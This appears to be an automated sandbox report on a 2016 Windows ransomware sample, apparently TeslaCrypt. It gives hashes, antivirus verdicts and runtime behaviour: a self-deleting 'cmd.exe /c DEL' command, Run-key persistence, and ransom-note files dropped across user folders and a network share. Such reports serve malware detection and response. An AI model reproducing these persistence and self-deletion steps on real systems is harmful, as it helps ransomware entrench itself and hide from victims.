Analysis Date: 2016-02-14 05:47:23
MD5: 5652b570b2c28cce99a474fc4275f6b2
SHA1: 5cd397d17d392011a66f51a58a6fdb9d5af65941

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .coat md5: 94e2f96f7a025201723af30a54119207 sha1: b83c17595631780eaf366681f8daa3920d5df160 size: 4608
Section: .cbbl md5: 7b5fb64d62c9614a84a410589355d786 sha1: 7ab2f7ce2bd08d2eec22a82b24bedd05bc5c269e size: 141824
Section: .rdata md5: 80e2301edbc94c9a1333609d35ceb5be sha1: c92a61d39c47df6e92aae058db539befebe02f65 size: 58880
Section: .data md5: 8f09a779ddf14e486f6da3ddcde4a4c0 sha1: 25332fdefe385d517e499eb6af997da0bd1acdbc size: 36864
Section: .rsrc md5: d82549349881ce799ca086341a0e0b7d sha1: bf001ffdeeb150a5b1e4888444c14d41078ed8e1 size: 188416
Timestamp: 2016-02-09 04:59:28
Packer: Microsoft Visual C++ ?.?
PEhash: b499a67e859b00358cc4426f730d55afe8753a47
IMPhash: bd2a8f9ba380f160b10d2209983a6ae7
AV: CA (E-Trust Ino) — Error Scanning File
AV: Rising — No Virus
AV: Mcafee — BackDoor-FDCH!5652B570B2C2
AV: Avira (antivir) — TR/Crypt.Xpack.445889
AV: Twister — No Virus
AV: Ad-Aware — Gen:Variant.Midie.7265
AV: Alwil (avast) — No Virus
AV: Eset (nod32) — Win32/Kryptik.ENJD
AV: Grisoft (avg) — Generic37.ALQE
AV: Symantec — Trojan.Cryptlock.N!g2
AV: Fortinet — W32/Kryptik.ENJD!tr
AV: BitDefender — Gen:Variant.Midie.7265
AV: K7 — Trojan ( 004ddc881 )
AV: Microsoft Security Essentials — Ransom:Win32/Tescrypt!rfn
AV: MicroWorld (escan) — Gen:Variant.Midie.7265
AV: MalwareBytes — Trojan.MalPack.PK
AV: Authentium — W32/Rovnix.C.gen!Eldorado
AV: Emsisoft — Gen:Variant.Midie.7265
AV: Frisk (f-prot) — No Virus
AV: Ikarus — Trojan.Win32.Crypt
AV: Zillya! — No Virus
AV: Kaspersky — Trojan-Ransom.Win32.Bitman.ifq
AV: Trend Micro — No Virus
AV: VirusBlokAda (vba32) — No Virus
AV: CAT (quickheal) — No Virus
AV: BullGuard — No Virus
AV: Arcabit (arcavir) — Gen:Variant.Midie.7265
AV: ClamAV — No Virus
AV: Dr. Web — Trojan.Inject1.56622
AV: F-Secure — Gen:Variant.Midie.7265

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c DEL C:\5CD397~1.EXE

Process
↳ C:\WINDOWS\system32\cmd.exe /c DEL C:\5CD397~1.EXE

Process
↳ C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dsfgsdf-67897869 ➝ C:\Documents and Settings\Administrator\Application Data\sjfqljh.exe\\x00
Registry: HKEY_CURRENT_USER\Software\xxxsys\ID ➝ NULL
Registry: HKEY_CURRENT_USER\Software\927051B6E2485B8D\data ➝ NULL
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20UI3716.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\recover_file_lujyhjfuj.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+jay.html
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\brndlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\manifest.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Templates\winword2.doc
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\glob.settings.js
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+jay.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+jay.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jay.txt
